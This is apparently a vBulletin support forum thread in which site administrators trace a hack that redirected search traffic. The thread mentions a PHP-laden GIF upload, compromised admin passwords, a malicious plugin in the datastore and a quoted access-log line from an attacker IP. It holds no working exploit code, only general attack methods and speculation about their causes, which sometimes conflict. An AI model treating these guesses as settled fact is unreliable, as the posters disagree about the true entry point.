Thanks. I would agree that it does seem that vB3 forums are more vulnerable to the redirect exploit, although it's unclear why. I guess this does confirm the sense in trying to ensure that ALL your software is up to date, whether it's vBulletin itself or add-ons.

Ok, I may be way off, but this is what I'm guessing...

Due to some server issues, the hacker was able to upload a malicious .gif file and run it as a php file. I have since corrected that issue, but too little too late...

That person has then since grabbed enough info from the database and uploaded the redirect script.

Since then they must have decoded the admin passwords, and used those to regain entrance back into the admin section.

...

I'm sure about the php laden gif file. I'm not sure about the getting db info and getting the passwords. But SOMEHOW, a person snagged two of my users admin passwords. Two people with nothing in common and living in different states. Or there is a major hole somewhere in the code.

Nothing, however it is not my job to provide complete forensic analysis of your third party addons to determine where the code is coming from. If this was a completely, 100% stock vBulletin board, we would to try to look into the issue. But every board I've checked has had vBSEO, also other plugins, but off the top of my head I haven't seen any similar ones specifically and is on vB3. That is the most common thing I've run into.

Thank you, Zachery.

However, two points:

1. CBrown above at http://www.vbulletin.com/forum/showt...=1#post2168506 identifies a different non-vBSEO plugin from vBulletin.org as the source on his installation.

2. While this may fix the problem by clearing/rebuilding the datastore, since the precise entry point and method is unclear, what's to stop the problem from reappearing?

For anyone having their search engine traffic redirected, I've only found plugin code in a vbseo plugin point in the datastore table. Enabling, and disabling a single plugin normally rebuilds the pluginlist in the datastore and fixes the problem.

Perhaps they are deleting the log records after they have finished.

That's what I figured, but can you comment on the post I made above:


How is it that I can find in my access logs on the server someone doing something in the control panel and editing, but nothing shows up in the vbulletin control panel log? The only thing vbulletin recorded is that the user logged in, but nothing about the control panel (that shows up in the server logs) was logged. I'm stumped by that...

They are attempting to view [or edit] a user account.

As your logs dont log the query string [or cookies], its hard to tell much more.

Haven't found much going through older logs... But I keep on seeing this:


89.212.30.147 - - [06/Jun/2011:22:27:16 -0500] "GET /forums/mcbadmin/user.php?do=update HTTP/1.0" 200 6248 "http://www.mcarterbrown.com/forums/mcbadmin/user.php?do=update" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"

That IP comes up as a Spam IP... Same thing done with a bunch of other IP addresses on different days. But someone is trying to do something in my admin section. Maybe running a script?

Ok, even I was hacked again. Now I didn't follow my last rule.

Change administrator passwords...

I did NOT do this. And because of this, some interesting stuff happened.

Here's the hack from this morning:
I left ALL the information and links in there because the greater good comes above some of my privacy at this point:



I grep'd my access_log and pulled out this info. That IP: 209.236.66.108 is from a Tor router, so the hacker is trying to stay anonymous.

Backstory: I had 3 admins... Myself, Cat, and Incynr8

My buddy incynr8 hasn't been around in a long long time, but he still had admin privileges from a while back. I noticed his account had activity a while back. Knew it wasn't him. Notified him to change his passwords. I removed his admin access.

In this log above (test.txt) you'll see the hacker logging into the server (mcbadmin is the admin folder for vbulletin, I renamed it, and will again after all this in a few days or so), the hacker logs in, and checks out the user "incynr8". Looks at his profile, etc. He sees that I'm catching on.

This time, after looking at the admin account "Cat", that person had a "last activity" in their profile showing for this morning... I know for a fact this person did not use or log in either.

So somehow the hacker got ANOTHER password from an admin.

...

Here's where it gets funny. I go and look at the "control panel" log for more evidence. I can't find any.

But my access_log on the server says someone was in the control panel. I check the control panel again... Where is says "Show Only Entries Generated By", and there is a choice for "all users" and then a drop down box for specific users.

Well, both of the admins "Cat" and "Incynr8" are not a choice. I don't know why... I'm in the drop down list, and I'm an admin, but I can no longer see the other two as a choice.

I have since changed my password now, and I am the only admin left on the site.

...

Also looking at the log, you can see the plugin the hacker used to edit the site to redirect. For me, plugin 671 is the "Disable Swear Censor Per Forum"

I'm going to go further back through my previous logs and see if I can't find out how these user passwords were compromised. Neither of the accounts hacked have been used in months.

I will most likely change my database password just in case. I would assume if the person had the database password, they would just do it that way, not logging in as an admin. Somehow the passwords are being cracked...

That's my update for now. Will post more as I go through older logs.

Its neither new nor a vbulletin issue - its a server exploit.

Thanks for this quick answer.

It was not a vBSEO issue either. It was/is a server permissions issue.

See above. This is NOT a vBulletin exploit. It's a file permissions issue. And it's not particularly new, but it may be part of some of the redirection issues people are experiencing.

Definitely not NEW and this is an old issue that was related to an older VBSEO exploit. What I am seeing is that malicious php files are hard to find and people are not able to clean it out 100% - leaving there sites susceptible to more attacks.